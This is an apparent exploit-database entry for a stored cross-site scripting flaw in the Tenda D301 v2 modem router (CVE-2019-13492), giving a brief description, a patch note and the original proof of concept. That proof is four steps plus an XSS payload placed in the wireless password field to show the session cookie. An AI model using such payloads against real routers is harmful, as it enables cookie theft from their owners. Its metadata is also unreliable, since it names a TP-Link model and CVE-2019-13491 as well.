tenda D301 v2 modem router stored xss CVE-2019-13492

vendor:

TD-W8960N

by:

ABDO10

8.8

CVSS

HIGH

Stored XSS

CWE

Product Name: TD-W8960N

Affected Version From: v2

Affected Version To: v2

Patch Exists: YES

Related CWE: 2019-13491

CPE: h:tenda:d301_v2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2019

tenda D301 v2 modem router stored xss CVE-2019-13492

A stored XSS vulnerability exists in the Tenda D301 v2 modem router. An attacker can exploit this vulnerability by entering a malicious payload in the password field of the router's web interface. When the user clicks on the 'click to display' button, the malicious payload will be executed, allowing the attacker to gain access to the user's cookies.

Mitigation:

Users should update their router to the latest version to patch this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
# Exploit Author: ABDO10
# Date : July, 11th 2019
# Product : Tenda D301 v2  Modem Router
# version : v2
# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
# Tested on: Linux
# CVE : 2019-13491


# Poc Instructions :
/*******************************************************************************************************************/
> 1 - Open modem router  on web browser default(192.168.1.1)
> 2 - Click on advanced -> Wireless -> Security
> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)>  as password
> 4 - Click on "click to display"
/*******************************************************************************************************************/